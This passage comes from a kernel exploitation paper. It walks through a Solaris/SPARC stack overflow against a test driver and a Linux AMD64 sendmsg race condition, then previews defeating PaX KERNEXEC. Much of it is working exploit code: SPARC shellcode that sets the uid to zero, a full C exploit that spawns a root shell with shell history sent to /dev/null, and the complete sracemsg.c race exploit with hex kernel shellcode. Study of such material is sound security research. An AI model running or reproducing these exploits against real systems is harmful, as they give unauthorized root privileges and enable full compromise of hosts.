At that point we're ready to write our 'shellcode' : 

# cat sparc_stack_fixup64.s

.globl begin
.globl end

begin:
        ldx [%g7+0x118], %l0    ! kthread_t->t_procp
        ldx [%l0+0x20], %l1     ! proc_t->p_cred
        st %g0, [%l1 + 4]       ! cred_t->cr_uid = 0
        ldx [%g7+8], %fp        ! kthread_t->t_stk
        ldx [%fp+0x18], %i7     ! saved %l3 : syscall_trap32
        sub %fp,2047,%fp        ! STACK_BIAS
        add 0xa8, %i7, %i7      ! return place inside syscall_trap32
        ret
        restore
end:


At this point it should be quite readable : the shellcode gets the
t_procp address from the kthread_t struct and from there the p_cred
address. It then sets to zero (the %g0 register is hardwired to zero)
the cr_uid member of the cred_t struct and uses the kthread_t->t_stk
value to set %fp. %fp is then dereferenced to get the 'syscall_trap32'
address, and the STACK_BIAS subtraction is performed.

The add 0xa8 is the only hardcoded value, and it's the 'return place'
inside syscall_trap32. You can quickly derive it from a ::findstack dcmd
with mdb. A more advanced shellcode could avoid this hardcoded value by
scanning opcodes from the start of the syscall_trap32 function, looking
for the jmpl %reg,%o7/nop sequence (syscall_trap32 doesn't get a new
window, and stays in the one sys_trap had created).
On all the boxes we tested it was always 0xa8, that's why we just left it
hardcoded.
As we said, we need the shellcode to be on the command line, 'shifted'
by 3 bytes to obtain the correct alignment. To achieve that, a simple
launcher code was used :

bash-2.05$ cat launcher_stack.c
#include <unistd.h>

char sc[] = "\x66\x66\x66"              // padding for alignment

int main()
{
        execl("e", sc, NULL);
        return 0;
}
The shellcode is the one presented before. 

Before showing the exploit code, let's just paste the vulnerable code,
from the dummy driver provided for Solaris :

< stuff/drivers/solaris/test.c >


static int handle_stack (intptr_t arg)
{
        char buf[32];
        struct test_comunique t_c;

        ddi_copyin((void *)arg, &t_c, sizeof(struct test_comunique), 0);

        cmn_err(CE_CONT, "Requested to copy over buf %d bytes from %p\n",
                t_c.size, &buf);

        ddi_copyin((void *)t_c.addr, buf, t_c.size, 0);            [1]

        return 0;
}

static int test_ioctl (dev_t dev, int cmd, intptr_t arg, int mode,
                        cred_t *cred_p, int *rval_p )
    cmn_err(CE_CONT, "ioctl called : cred %d %d\n", cred_p->cr_uid,

    switch ( cmd )
        case TEST_STACKOVF: {


< / > 

The vulnerability is quite self-explanatory : a lack of 'input
sanitizing' before calling ddi_copyin at [1].

Exploit follows :

< stuff/expl/solaris/e_stack.c >

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include "test.h"

#define BUFSIZ 192

char buf[192];

typedef struct psinfo {
        int     pr_flag;        /* process flags */
        int     pr_nlwp;        /* number of lwps in process */
        pid_t   pr_pid;         /* unique process id */
        pid_t   pr_ppid;        /* process id of parent */
        pid_t   pr_pgid;        /* pid of process group leader */
        pid_t   pr_sid;         /* session id */
        uid_t   pr_uid;         /* real user id */
        uid_t   pr_euid;        /* effective user id */
        gid_t   pr_gid;         /* real group id */
        gid_t   pr_egid;        /* effective group id */
        uintptr_t pr_addr;      /* address of process */
        size_t  pr_size;        /* size of process image in Kbytes */
} psinfo_t;

#define ALIGNPAD        3

#define PSINFO_PATH     "/proc/self/psinfo"

unsigned long getaddr()
{
        psinfo_t        info;
        int             fd;

        fd = open(PSINFO_PATH, O_RDONLY);
        if ( fd == -1)
                return -1;

        read(fd, (char *)&info, sizeof (info));
        return info.pr_addr;
}

#define UPSARGS_OFFSET 0x330 + 0x161

int exploit_me()
{
        char    *argv[] = { "princess", NULL };
        char    *envp[] = { "TERM=vt100", "BASH_HISTORY=/dev/null",
"HISTORY=/dev/null", "history=/dev/null",
"HISTFILE=/dev/null", NULL };

         printf("Pleased to see you, my Princess\n");
         setreuid(0, 0);
         setregid(0, 0);
         execve("/bin/sh", argv, envp);
         return 0;
}

#define SAFE_FP     0x0000000001800040 + 1
#define DUMMY_FILE  "/tmp/test"

int main()
{
        int                     fd;
        int                     ret;
        struct test_comunique   t;
        unsigned long           *pbuf, retaddr, p_addr;

        memset(buf, 'A', BUFSIZ);

        p_addr = getaddr();

        printf("[*] - Using proc_t addr : %p \n", p_addr);

        retaddr = p_addr + UPSARGS_OFFSET + ALIGNPAD;

        printf("[*] - Using ret addr : %p\n", retaddr);

        pbuf = (unsigned long *)&buf[32];

        pbuf += 2;

        /* locals */

        for ( ret = 0; ret < 14; ret++ )
                *pbuf++ = 0xBBBBBBBB + ret;
        *pbuf++ = SAFE_FP;
        *pbuf = retaddr - 8;

        t.size = sizeof(buf);
        t.addr = buf;

        fd = open(DUMMY_FILE, O_RDONLY);

        ret = ioctl(fd, 1, &t);
        printf("fun %d\n", ret);

        return 0;
}

< / >

The exploit is quite simple (we apologize, but we didn't have a public one
to show at the time of writing) :

  - getaddr() uses procfs exported psinfo data to get the proc_t address
    of the running process.

  - the return addr is calculated from the proc_t addr + the offset of the
    u_psargs array + the three bytes needed for alignment.
  - SAFE_FP points just 'somewhere in the data segment' (and ready to be
    biased for the real dereference). Due to the SPARC window mechanism we
    have to provide a valid address that will be used to 'load' the
    saved procedure registers upon re-entering. We don't write at that
    address, so any readable kernel address is safe. (in more complex
    scenarios you might have to write there too, so take care).

  - /tmp/test is just a link to the /devices/pseudo/test@0:0 file      
  - the exploit has to be compiled as a 32-bit executable, so that the
    syscall_trap32 offset is meaningful 

You can compile and test the driver on your boxes, it's really simple. You
can extend it to test more scenarios, the skeleton is ready for it.

------[ 2.4 - A primer on logical bugs : race conditions

Heap and Stack Overflows (and, even more so, NULL pointer dereferences)
are seldom found on their own and, since the automatic and human auditing
work goes on and on, they're going to become even rarer.
What will probably survive longer are 'logical bugs', which may
lead, in the end, to a classic overflow.
Working out a general model of 'logical bugs' is, in our opinion, nearly
impossible; each one is a story in itself.
Notwithstanding this, one typology of those is quite interesting (and
'widespread') and at least some basic approaches to it are suitable for a
generic description.

We're talking about 'race conditions'. 

In short, we have a race condition every time we have a small window of
time that we can use to subvert the operating system behaviour. A race
condition is usually the consequence of a forgotten lock or other
synchronization primitive, or of the use of a variable 'too long after'
the sanitizing of its value. Just point your favorite vuln database search
engine at 'kernel race condition' and you'll find many different
examples.

Winning the race is our goal. This is easier on SMP systems, since the two
racing threads (the one following the 'raceable kernel path' and the one
competing to win the race) can be scheduled (and be bound) on different
CPUs. We just need to have the 'racing thread' go faster than the other
one, since they both can execute in parallel.
Winning a race on UP is harder : we have to force the first kernel path
to sleep (and thus to re-schedule). We also have to 'force' the scheduler
into selecting our 'racing' thread, so we have to take care of the
scheduling algorithm implementation (ex. priority based). On a system
with a low CPU load this is generally easy to achieve : the racing thread
is usually 'spinning' on some condition and is likely the best candidate
on the runqueue.

We're going now to focus more on 'forcing' a kernel path to sleep,
analyzing the nowadays common interface to access files, the page cache.
After that we'll present the AMD64 architecture and show a real race
exploit for Linux on it, based on the sendmsg [5] vulnerability.
Winning the race in that case turns the vuln into a stack based one, so
the discussion will analyze stack based exploitation on Linux/AMD64 too.

---[ 2.4.1 - Forcing a kernel path to sleep 

If you want to win a race, what's better than slowing down your opponent?
And what's slower than accessing the hard disk, in a modern computer ? 
Operating systems designers know that I/O over the disk is one of the
major bottlenecks for system performance, and know as well that it is one
of the most frequently requested operations.

Disk accessing and Virtual Memory are closely tied : virtual memory needs
to access the disk to accomplish demand paging and in/out swapping, while
the filesystem based I/O (both direct read/write and memory mapping of
files) works in units of pages and relies on VM functions to perform the
write out of 'dirty' pages. Moreover, to sensibly increase performance,
frequently accessed disk pages are kept in RAM, in the so-called 'Page
Cache'.

Since RAM isn't an inexhaustible resource, pages to be loaded and 'cached'
into it have to be carefully 'selected'. The first skimming is made by the
'Demand Paging' approach : a page is loaded from disk into memory only
when it is referenced, by the page fault handler code.
Once a filesystem page is loaded into memory, it enters the 'Page
Cache' and stays in memory for an unspecified time (depending on disk
activity and RAM availability; generally an LRU policy is used as an
eviction algorithm).
Since it's quite common for a userland application to repeatedly access
the same disk content/pages (or for different applications, to access
common files), the 'Page Cache' sensibly increases performance.

One last thing that we have to discuss is the filesystem 'page clustering'.
Another common principle in 'caching' is 'locality'. Pages near the
referenced one are likely to be accessed in the near future, and since
we're accessing the disk anyway we can avoid a future seek-rotation
latency if we load in more pages after the referenced one. How many to
load is determined by the page cluster value.
On Linux that value is 3, so 2^3 pages are loaded after the referenced
one. On Solaris, if the pages are 8KB-sized, the next eight pages on a
64KB boundary are brought in by the seg_vn driver (mmap-case).

Putting it all together, if we want to force a kernel path to sleep we
need to make it reference an un-cached page, so that a 'fault' happens due
to the demand paging implementation. The page fault handler needs to
perform disk I/O, so the process is put to sleep and another one is
selected by the scheduler. Since we probably also want our 'controlled
contents' to be at the faulting address, we need to mmap the pages, modify
them and then exhaust the page cache before making the kernel re-access
them again.

Filling the 'page cache' also has the effect of consuming a large quantity
of RAM and thus increasing the in/out swapping. On modern operating
systems one can't create a condition of memory pressure only by exhausting
the page cache (as was possible on very old implementations), since
only some amount of RAM is dedicated to the Page Cache and it would keep
on stealing pages from itself, leaving other subsystems free to perform
well. But we can manage to exhaust those subsystems as well, for example
by making the kernel do a large amount of 'surviving' slab-allocations.

Working to put the VM under pressure is something to always keep in mind,
since, once done, one can manage to slow down the kernel (favouring races)
and make kmalloc or other allocation functions fail (something that
seldom happens in normal operation).

It is time, now, for another real life situation. We'll show the sendmsg
[5] vulnerability and exploiting code, and we'll briefly describe the
AMD64 architectural details most relevant to exploitation.

---[ 2.4.2 - AMD64 and race condition exploiting: sendmsg

AMD64 is the 64-bit 'extension' of the x86 architecture, which is natively
supported. It supports 64-bit registers, pointers/virtual addresses and
integer/logic operations. AMD64 has two primary modes of operation, 'Long
mode', which is the standard 64-bit one (32-bit and 16-bit binaries can be
still run with almost no performance impact, or even, if recompiled, with
some benefit from the extended number of registers, thanks to the
sometimes-called 'compatibility mode') and 'Legacy mode', for 32-bit 
operating systems, which is basically just like having a standard x86
processor environment.

Even if we won't use all of them in the sendmsg exploit, we're going now
to sum up a couple of interesting features of the AMD64 architecture :

  - The number of general purpose registers has been extended from 8 up
    to 16. The registers are all 64-bit long (referred to as 'r[name|num]',
    f.e. rax, r10). Just as happened in the transition from 16-bit to
    32-bit, the lower 32 bits of the general purpose registers are
    accessible with the 'e' prefix (f.e. eax).

  - push/pop on the stack are 64-bit operations, so 8 bytes are
    pushed/popped each time. Pointers are 64-bit too and that allows a
    theoretical virtual address space of 2^64 bytes. As happens for the
    UltraSPARC architecture, current implementations address a limited
    virtual address space (2^48 bytes) and thus have a VA-hole (the least
    significant 48 bits are used and bits from 48 up to 63 must be copies
    of bit 47 : the hole is thus between 0x00007FFFFFFFFFFF and
    0xFFFF800000000000).
    This limitation is strictly implementation-dependent, so any future
    implementation might take advantage of the full 2^64 bytes range.
  - It is now possible to reference data relative to the Instruction
    Pointer register (RIP). This is both good and bad news, since it
    makes it easier to write position independent (shell)code, but also
    makes it more efficient (opening the way for more performant PIE-like
    implementations).

  - The (in)famous NX bit (bit 63 of the page table entry) is implemented
    and so pages can be marked as No-Exec by the operating system. This is
    less of an issue than on UltraSPARC since there's currently no
    operating system which implements a separated userspace/kernelspace
    addressing, thus leaving open space for the use of the
    'return-to-userspace' technique.

  - AMD64 no longer supports (in 'long mode') the use of
    segmentation. This choice makes the creation of a separated
    user/kernel address space harder, in our opinion. Moreover the FS and
    GS registers are still used for different purposes. As we'll see, the
    Linux Operating System keeps the GS register pointing to the 'current'
    PDA (Per Processor Data Structure). (check : /include/asm-x86_64/pda.h
    struct x8664_pda .. anyway we'll get back to that shortly).

After this brief summary (if you want to learn more about the AMD64
architecture you can check the reference manuals at [3]) it is time now to
focus over the 'real vulnerability', the sendmsg [5] one : 

"When we copy 32bit ->msg_control contents to kernel, we walk the
same userland data twice without sanity checks on the second pass.
Moreover, if original looks small enough, we end up copying to on-stack
array."

< linux-2.6.9/net/compat.c >

int cmsghdr_from_user_compat_to_kern(struct msghdr *kmsg,
                               unsigned char *stackbuf, int stackbuf_size)
{
        struct compat_cmsghdr __user *ucmsg;
        struct cmsghdr *kcmsg, *kcmsg_base;
        compat_size_t ucmlen;
        __kernel_size_t kcmlen, tmp;

        kcmlen = 0;
        kcmsg_base = kcmsg = (struct cmsghdr *)stackbuf;            [1]

        ucmsg = CMSG_COMPAT_FIRSTHDR(kmsg);
        while(ucmsg != NULL) {
                if(get_user(ucmlen, &ucmsg->cmsg_len))              [2]
                        return -EFAULT;

                /* Catch bogons. */
                if(CMSG_COMPAT_ALIGN(ucmlen) <
                   CMSG_COMPAT_ALIGN(sizeof(struct compat_cmsghdr)))
                        return -EINVAL;
                if((unsigned long)(((char __user *)ucmsg - (char __user
                   *)kmsg->msg_control) + ucmlen)
                                   > kmsg->msg_controllen)           [3]
                        return -EINVAL;

                tmp = ((ucmlen - CMSG_COMPAT_ALIGN(sizeof(*ucmsg))) +
                       CMSG_ALIGN(sizeof(struct cmsghdr)));
                kcmlen += tmp;                                       [4]
                ucmsg = cmsg_compat_nxthdr(kmsg, ucmsg, ucmlen);
        }

        if(kcmlen > stackbuf_size)                                   [5]
                kcmsg_base = kcmsg = kmalloc(kcmlen, GFP_KERNEL);

        ucmsg = CMSG_COMPAT_FIRSTHDR(kmsg);
        while(ucmsg != NULL) {
                __get_user(ucmlen, &ucmsg->cmsg_len);                [6]
                tmp = ((ucmlen - CMSG_COMPAT_ALIGN(sizeof(*ucmsg))) +
                       CMSG_ALIGN(sizeof(struct cmsghdr)));
                kcmsg->cmsg_len = tmp;
                __get_user(kcmsg->cmsg_level, &ucmsg->cmsg_level);
                __get_user(kcmsg->cmsg_type, &ucmsg->cmsg_type);

                /* Copy over the data. */
                if(copy_from_user(CMSG_DATA(kcmsg),                  [7]
                                  CMSG_COMPAT_DATA(ucmsg),
                                  (ucmlen -
                                   CMSG_COMPAT_ALIGN(sizeof(*ucmsg)))))
                        goto out_free_efault;

< / >

As is said in the advisory, the vulnerability is a double-reference to
some userland data (at [2] and at [6]) without re-sanitizing the value the
second time it is fetched from userland (at [3] the check is performed,
instead). That 'data' is the 'size' of the user-part to copy-in
('ucmlen'), and it's used, at [7], inside the copy_from_user.

This is a pretty common scenario for a race condition : if we create two
different threads, make the first one enter the codepath and, after [4],
we manage to put it to sleep and have the scheduler select the other
thread, we can change the 'ucmlen' value and thus perform a 'buffer
overflow'.

The kind of overflow we're going to perform is 'decided' at [5] : if the
len is small, the buffer used will be on the stack, otherwise it will be
kmalloc'ed. Both situations are exploitable, but we've chosen the stack
based one (we have already presented a slab exploit for the Linux
operating system before). We're going to use, inside the exploit, the
technique we presented in the previous subsection to force a process to
sleep, that is making it access data on a cross page boundary (with the
second page never referenced before nor already swapped in by the page
clustering mechanism) :

+------------+ --------> 0x20020000 [MMAP_ADDR + 32 * PAGE_SIZE] [*]
|            |
| cmsg_len   |           first cmsg_len starts at 0x2001fff4
| cmsg_level |           first struct compat_cmsghdr
| cmsg_type  |
|------------| -------->              0x20020000  [cross page boundary]
| cmsg_len   |           second cmsg_len starts at 0x20020000
| cmsg_level |           second struct compat_cmsghdr
| cmsg_type  |
|            |
+------------+ --------> 0x20021000

[*] One of those so-called 'runtime adjustments'. The page clustering
    wasn't showing the expected behaviour in the first 32 mmaped pages,
    while it worked just as expected afterwards.

As we said, we're going to perform a stack-based exploitation, writing
past the 'stackbuf' variable. Let's see where we get it from :

< linux-2.6.9/net/socket.c > 

asmlinkage long sys_sendmsg(int fd, struct msghdr __user *msg,
                            unsigned flags)
{
        struct compat_msghdr __user *msg_compat =
        (struct compat_msghdr __user *)msg;
        struct socket *sock;
        char address[MAX_SOCK_ADDR];
        struct iovec iovstack[UIO_FASTIOV], *iov = iovstack;
        unsigned char ctl[sizeof(struct cmsghdr) + 20];
        unsigned char *ctl_buf = ctl;
        struct msghdr msg_sys;
        int err, ctl_len, iov_size, total_len;

        if ((MSG_CMSG_COMPAT & flags) && ctl_len) {
err = cmsghdr_from_user_compat_to_kern(&msg_sys, ctl, sizeof(ctl));


< / >

The situation is less nasty than it seems (at least on the systems we
tested the code on) : thanks to gcc reordering the stack variables we get
our 'msg_sys' struct placed as if it were the first variable.
That simplifies our exploiting task a lot, since we don't have to take
care of 'emulating' in userspace the structures referenced between our
overflow and the 'return' of the function (for example the struct sock).
Exploiting in this 'second case' would be slightly more complex, but
doable as well.

The shellcode for the exploit is not much different (as expected, since
AMD64 is a 'superset' of the x86 architecture) from the ones provided
before for the Linux/x86 environment; nevertheless we have to focus on two
important differences : the 'thread/task struct dereference' and the
'userspace context switch approach'.

For the first point, let's start analyzing the get_current()
implementation : 

< linux-2.6.9/include/asm-x86_64/current.h >

#include <asm/pda.h>

static inline struct task_struct *get_current(void)
{
        struct task_struct *t = read_pda(pcurrent);
        return t;
}
#define current get_current()


#define GET_CURRENT(reg) movq %gs:(pda_pcurrent),reg

< / > 

< linux-2.6.9/include/asm-x86_64/pda.h >

struct x8664_pda {
        struct task_struct *pcurrent;   /* Current process */
        unsigned long data_offset;      /* Per cpu data offset from linker
address */
        struct x8664_pda *me;       /* Pointer to itself */
        unsigned long kernelstack;  /* top of kernel stack for current */
        ...
};
#define pda_from_op(op,field) ({ \
       typedef typeof_field(struct x8664_pda, field) T__; T__ ret__; \
       switch (sizeof_field(struct x8664_pda, field)) {                 \
       case 2: \
       asm volatile(op "w %%gs:%P1,%0":"=r" \
       (ret__):"i"(pda_offset(field)):"memory"); break;\
       ... \
       } \
       ret__; })

#define read_pda(field) pda_from_op("mov",field)
< / > 

The task_struct is thus no longer on the 'current stack' (more precisely,
referenced from the thread_info struct which is actually saved on the
'current stack'), but is stored in the 'struct x8664_pda'. This struct
keeps much information relative to the 'current' process and the CPU it
is running on (kernel stack address, irq nesting counter, the cpu it is
running on, number of NMIs on that cpu, etc).
As you can see from the 'pda_from_op' macro, during the execution of a
Kernel Path, the address of the 'struct x8664_pda' is kept inside the %gs
register. Moreover, the 'pcurrent' member (which is the one we're actually
interested in) is the first one, so obtaining it from inside a shellcode
is just a matter of doing a : 

	movq %gs:0x0, %rax 

From that point on the 'scanning' to locate uid/gid/etc is just the same
used in the previously shown exploits. 

The second point which quite differs from the x86 case is the 'restore'
part (which is, also, a direct consequence of the %gs usage).
First of all we have to do a '64-bit based' restore, that is we have to
push the 64-bit registers RIP, CS, RFLAGS, RSP and SS and call, at the
end, the 'iretq' instruction (the extended version of the 'iret' one on
x86). Just before returning we have to remember to perform the 'swapgs'
instruction, which swaps the %gs content with the one of the KernelGSbase
(MSR address C000_0102h).
If we don't restore %gs, at the next syscall or interrupt the kernel will
use an invalid value for the gs register and will just crash.

Here's the shellcode in asm inline notation :

void stub64bit()
{
asm volatile (
                "movl %0, %%esi\t\n"
                "movq %%gs:0, %%rax\n"
                "xor %%ecx, %%ecx\t\n"
                "1: cmp $0x12c, %%ecx\t\n"
                "je 4f\t\n"
                "movl (%%rax), %%edx\t\n"
                "cmpl %%esi, %%edx\t\n"
                "jne 3f\t\n"
                "movl 0x4(%%rax),%%edx\t\n"
                "cmp %%esi, %%edx\t\n"
                "jne 3f\t\n"
                "xor %%edx, %%edx\t\n"
                "movl %%edx, 0x4(%%rax)\t\n"
                "jmp 4f\t\n"
                "3: add $4,%%rax\t\n"
                "inc %%ecx\t\n"
                "jmp 1b\t\n"
                "4: swapgs\t\n"
                "movq $0x000000000000002b,0x20(%%rsp)\t\n"
                "movq %1,0x18(%%rsp)\t\n"
                "movq $0x0000000000000246,0x10(%%rsp)\t\n"
                "movq $0x0000000000000023,0x8(%%rsp)\t\n"
                "movq %2,0x0(%%rsp)\t\n"
                "iretq\t\n"
                : : "i"(UID), "i"(STACK_OFFSET), "i"(CODE_OFFSET)
        );
}

With UID being the 'uid' of the current running process and STACK_OFFSET
and CODE_OFFSET the address of the stack and code 'segment' we're
returning into in userspace. All those values are taken and patched at
runtime in the exploit 'make_kjump' function : 

< stuff/expl/linux/sracemsg.c > 

#define PAGE_SIZE 0x1000
#define MMAP_ADDR ((void*)0x20000000)
#define MMAP_NULL ((void*)0x00000000)
#define PAGE_NUM 128

#define PATCH_CODE(base,offset,value) \
       *((uint32_t *)((char*)base + offset)) = (uint32_t)(value)

#define fatal_errno(x,y) { perror(x); exit(y); }

struct cmsghdr *g_ancillary;

/* global shared value to sync threads for race */
volatile static int glob_race = 0;

#define UID_OFFSET 1
#define CODE_OFF_OFFSET  95


int make_kjump(void)
{
  void *stack_map = mmap((void*)(0x11110000), 0x2000,
                         PROT_READ|PROT_WRITE,
                         MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  if(stack_map == MAP_FAILED)
    fatal_errno("mmap", 1);

  void *shellcode_map = mmap(MMAP_NULL, 0x1000,
                             PROT_READ|PROT_WRITE|PROT_EXEC,
                             MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  if(shellcode_map == MAP_FAILED)
    fatal_errno("mmap", 1);

  memcpy(shellcode_map, kernel_stub, sizeof(kernel_stub)-1);

  PATCH_CODE(MMAP_NULL, UID_OFFSET, getuid());
  PATCH_CODE(MMAP_NULL, CODE_OFF_OFFSET, eip_do_exit);

  return 0;
}

< / > 

The rest of the exploit should be quite self-explanatory and is shown in
full hereafter. Note the lowering of the priority
inside start_thread_priority ('nice(19)'), so that we have some more
chances to win the race (the 'glob_race' variable works just like a
spinning lock for the main thread - check 'race_func()').

As a last note, we use the 'rdtsc' (read time stamp counter) instruction
to calculate the time elapsed while trying to win the race. If
this gap is large it is quite probable that a scheduling happened.
The task of 'flushing all pages' (from the page cache), so that we'll be
sure that we'll end up using demand paging on the cross boundary access,
is not implemented inside the code (it could have been easily added) and
is left to the exploit runner. Since we have to create the file with
controlled data, those pages end up cached in the page cache, and we have
to force the subsystem into discarding them. It shouldn't be hard for you,
if you followed the discussion so far, to perform tasks that would 'flush
the needed pages' to disk or to add code to automate it (hint : a mass
find & cat * > /dev/null is an idea).

Last but not least, since the vulnerable function is inside 'compat.c',
which is the 'compatibility mode' to run 32-bit based binaries, remember to
compile the exploit with the -m32 flag.

< stuff/expl/linux/sracemsg.c >
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sched.h>
#include <sys/socket.h>

#define PAGE_SIZE 0x1000
#define MMAP_ADDR ((void*)0x20000000)
#define MMAP_NULL ((void*)0x00000000)
#define PAGE_NUM 128

#define PATCH_CODE(base,offset,value) \
       *((uint32_t *)((char*)base + offset)) = (uint32_t)(value)

#define fatal_errno(x,y) { perror(x); exit(y); }

struct cmsghdr *g_ancillary;

/* global shared value to sync threads for race */
volatile static int glob_race = 0;

#define UID_OFFSET 1
#define CODE_OFF_OFFSET  95

char kernel_stub[] =

"\xbe\xe8\x03\x00\x00"                   //  mov    $0x3e8,%esi
"\x65\x48\x8b\x04\x25\x00\x00\x00\x00"   //  mov    %gs:0x0,%rax
"\x31\xc9"                               //  xor    %ecx,%ecx
"\x81\xf9\x2c\x01\x00\x00"               //  cmp    $0x12c,%ecx
"\x74\x1c"                               //  je     400af0
"\x8b\x10"                               //  mov    (%rax),%edx
"\x39\xf2"                               //  cmp    %esi,%edx
"\x75\x0e"                               //  jne    400ae8
"\x8b\x50\x04"                           //  mov    0x4(%rax),%edx
"\x39\xf2"                               //  cmp    %esi,%edx
"\x75\x07"                               //  jne    400ae8
"\x31\xd2"                               //  xor    %edx,%edx
"\x89\x50\x04"                           //  mov    %edx,0x4(%rax)
"\xeb\x08"                               //  jmp    400af0
"\x48\x83\xc0\x04"                       //  add    $0x4,%rax
"\xff\xc1"                               //  inc    %ecx
"\xeb\xdc"                               //  jmp    400acc
"\x0f\x01\xf8"                           //  swapgs
"\x48\xc7\x44\x24\x20\x2b\x00\x00\x00"   //  movq   $0x2b,0x20(%rsp)
"\x48\xc7\x44\x24\x18\x11\x11\x11\x11"   //  movq   $0x11111111,0x18(%rsp)
"\x48\xc7\x44\x24\x10\x46\x02\x00\x00"   //  movq   $0x246,0x10(%rsp)
"\x48\xc7\x44\x24\x08\x23\x00\x00\x00"   //  movq   $0x23,0x8(%rsp)  /* 23 32-bit cs, 33 64-bit cs */
"\x48\xc7\x04\x24\x22\x22\x22\x22"       //  movq   $0x22222222,(%rsp)
"\x48\xcf";                              //  iretq

void eip_do_exit(void)
{
  char *argvx[] = {"/bin/sh", NULL};
  printf("uid=%d\n", geteuid());
  execve("/bin/sh", argvx, NULL);
}

/*
 * This function maps stack and code segment
 * - 0x0000000000000000 - 0x0000000000001000   (future code space)
 * - 0x0000000011110000 - 0x0000000011112000   (future stack space)
 */

int make_kjump(void)
{
  void *stack_map = mmap((void*)(0x11110000), 0x2000,
                         PROT_READ|PROT_WRITE,
                         MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  if(stack_map == MAP_FAILED)
    fatal_errno("mmap", 1);

  void *shellcode_map = mmap(MMAP_NULL, 0x1000,
                             PROT_READ|PROT_WRITE|PROT_EXEC,
                             MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  if(shellcode_map == MAP_FAILED)
    fatal_errno("mmap", 1);

  memcpy(shellcode_map, kernel_stub, sizeof(kernel_stub)-1);

  PATCH_CODE(MMAP_NULL, UID_OFFSET, getuid());
  PATCH_CODE(MMAP_NULL, CODE_OFF_OFFSET, eip_do_exit);

  return 0;
}


int start_thread_priority(int (*f)(void *), void* arg)
{
  char *stack = malloc(PAGE_SIZE*4);
  int tid = clone(f, stack + PAGE_SIZE*4 - 4,
                  CLONE_FS|CLONE_FILES|CLONE_VM|SIGCHLD, arg);
  if(tid < 0)
    fatal_errno("clone", 1);
  nice(19);
  return tid;
}

int race_func(void* noarg)
{
  printf("[*] thread racer getpid()=%d\n", getpid());
  while(1)
  {
    if(glob_race)
    {
      g_ancillary->cmsg_len = 500;
      return 0;
    }
  }
}

uint64_t tsc()
{
  uint64_t ret;
  asm volatile("rdtsc" : "=A"(ret));
  return ret;
}

struct tsc_stamp
{
  uint64_t before;
  uint64_t after;
  uint32_t access;
};
struct tsc_stamp stamp[128];

inline char *flat_file_mmap(int fs)
{
  void *addr = mmap(MMAP_ADDR, PAGE_SIZE*PAGE_NUM, PROT_READ|PROT_WRITE,
                    MAP_SHARED, fs, 0);
  if(addr == MAP_FAILED)
    fatal_errno("mmap", 1);
  return (char*)addr;
}

void scan_addr(char *memory)
{
  int i;
  for(i=1; i<PAGE_NUM-1; i++)
  {
    stamp[i].access = (uint32_t)(memory + i*PAGE_SIZE);
    uint32_t dummy = *((uint32_t *)(memory + i*PAGE_SIZE-4));
    stamp[i].before = tsc();
    dummy = *((uint32_t *)(memory + i*PAGE_SIZE));
    stamp[i].after  = tsc();
  }
}


/* make code access first 32 pages to flush page-cluster */
/* access: 0x20000000 - 0x2000XXXX */

void start_flush_access(char *memory, uint32_t page_num)
{
  int i;
  for(i=0; i<page_num; i++)
  {
    uint32_t dummy = *((uint32_t *)(memory + i*PAGE_SIZE));
  }
}

void print_single_result(struct tsc_stamp *entry)
{
  printf("Accessing: %p, tsc-difference: %lld\n", entry->access,
entry->after - entry->before);
}

void print_result()
{
  int i;
  for(i=1; i<PAGE_NUM-1; i++)
    printf("Accessing: %p, tsc-difference: %lld\n", stamp[i].access,
stamp[i].after - stamp[i].before);
}

void fill_ancillary(struct msghdr *msg, char *ancillary)
{
  msg->msg_control = ((ancillary + 32*PAGE_SIZE) -
                      sizeof(struct cmsghdr));
  msg->msg_controllen = sizeof(struct cmsghdr) * 2;

  /* set global var thread race ancillary data chunk */
  g_ancillary = msg->msg_control;

  struct cmsghdr* tmp = (struct cmsghdr *)(msg->msg_control);
  tmp->cmsg_len   = sizeof(struct cmsghdr);
  tmp->cmsg_level = 0;
  tmp->cmsg_type  = 0;
  tmp++;

  tmp->cmsg_len   = sizeof(struct cmsghdr);
  tmp->cmsg_level = 0;
  tmp->cmsg_type  = 0;
  tmp++;

  memset(tmp, 0x00, 172);
}

int main()
{
  struct tsc_stamp single_stamp = {0};
  struct msghdr msg = {0};

  memset(&stamp, 0x00, sizeof(stamp));
  int fd = open("/tmp/file", O_RDWR);
  if(fd == -1)
    fatal_errno("open", 1);

  char *addr = flat_file_mmap(fd);

  fill_ancillary(&msg, addr);

  munmap(addr, PAGE_SIZE*PAGE_NUM);

  printf("Flush all pages and press enter :)\n");
  getchar();

  fd = open("/tmp/file", O_RDWR);
  if(fd == -1)
    fatal_errno("open", 1);
  addr = flat_file_mmap(fd);

  int t_pid = start_thread_priority(race_func, NULL);
  printf("[*] thread main getpid()=%d\n", getpid());

  start_flush_access(addr, 32);

  int sc[2];
  int sp_ret = socketpair(AF_UNIX, SOCK_STREAM, 0, sc);
  if(sp_ret < 0)
    fatal_errno("socketpair", 1);

  single_stamp.access = (uint32_t)g_ancillary;
  single_stamp.before = tsc();

  glob_race =1;
  sendmsg(sc[0], &msg, 0);

  single_stamp.after = tsc();
  print_single_result(&single_stamp);

  kill(t_pid, SIGKILL);
  munmap(addr, PAGE_SIZE*PAGE_NUM);
  return 0;
}

< / > 

------[ 3 - Advanced scenarios 

In an attempt to ''complete'' our tractation on kernel exploiting we're
now going to discuss two 'advanced scenarios' : a stack based kernel
exploit capable to bypass PaX [18] KERNEXEC and Userland / Kernelland
split and an effective remote exploit, both for the Linux kernel. 

---[ 3.1 - PaX KERNEXEC & separated kernel/user space

The PaX KERNEXEC option emulates a no-exec bit for pages at kernel land
on an architecture which doesn't have one (x86), while the User / Kernel
Land split blocks the 'return-to-userland' approach that we have
extensively described and used in this paper. With those two protections
active we're basically facing the same scenario we encountered discussing
the Solaris/SPARC environment, so we won't go into more detail here (to
avoid duplicating the discussion).

